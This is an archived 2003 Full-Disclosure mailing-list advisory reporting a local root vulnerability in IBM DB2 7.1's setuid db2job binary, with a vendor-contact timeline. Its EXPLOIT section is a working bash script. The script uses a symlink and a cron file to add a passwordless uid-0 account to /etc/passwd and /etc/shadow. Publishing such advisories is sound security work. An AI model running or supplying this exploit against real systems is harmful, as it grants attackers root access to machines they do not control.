lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 5 Aug 2003 16:09:09 +0200 (CEST)
From: pask@...c.upv.es
To: full-disclosure@...ts.netsys.com
Cc: bugtraq@...urityfocus.com
Subject: Local Vulnerability in IBM DB2 7.1 db2job binary






 Title:    Local Vulnerability in IBM DB2 7.1 db2job binary
 Date:     27-07-2003
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Users with exec perm over ./db2as/sqllib/adm/db2job can create files 
	   with 770 mode and owned by root.
 Author:   Juan Manuel Pascual Escriba <pask@...net.edu>
 Status:   Vendor contacted details below.


PROBLEM SUMMARY:

 There is a write permisions checking error in db2job binary that can be used by local
users with exec perm over db2job to write any file owned by root with mode 770. 


DESCRIPTION

db2job is installed with 4550 perm and owned by root.db2asgrp in my default installation

[pask@...oniet home]$ ls -alc ./db2as/sqllib/adm/db2job
-r-sr-x---    1 root     db2asgrp   339402 Jun 21  2002 ./db2as/sqllib/adm/db2job

only db2as and db2inst1 are in db2asgrp then they are the only users that can achieve root 
privileges with this bug. Always the sysmanager can chmod 6555 db2job for admin purposes, and 
the users go wide.


The binary does'nt drop privileges before writing the log and writes the next files owned by root:

-rw-r-----    1 root     db2asgrp /home/db2as/sqllib/db2jobht.prf
-rw-r-----    1 root     db2asgrp /home/db2as/sqllib/db2jobht.bak
-rw-r-----    1 root     db2asgrp /home/db2as/sqllib/db2jobsm.bak
-rwxrwx---    1 root     db2asgrp /home/db2as/sqllib/0_1.out



IMPACT:

	Easy to overwrite or create new files owned by root (.rhosts, cron files) via link 
injection....

EXPLOIT

#!/bin/bash

DB2JOB=/home/db2as/sqllib/adm/db2job
CRONFILE=/etc/cron.hourly/pakito
USER=pakito

unset DB2INSTANCE
export DB2DIR=./trash

        if [ -d $DB2DIR ]; then
                echo Trash directory already created
        else
                mkdir $DB2DIR
        fi

cd $DB2DIR
        if [ -f ./0_1.out ]; then
                echo Link Already Created
        else
                ln -s $CRONFILE ./0_1.out
        fi

$DB2JOB


echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo "  must wait until cron execute $CRONFILE and then exec su pakito"


 STATUS 

	This bug was reported to security-alert@...tin.ibm.com on July 27. 
After that on July 29 IBM sec staff forwards as bcc my emails to with db2 
security team. At 5th August i have'nt any idea about db2 sec team emails 
or how to contact  it.





--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask@...net.edu

http://concepcion.upv.es/~pask/advisories/2003/IBM%20DB2%20db2job








_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ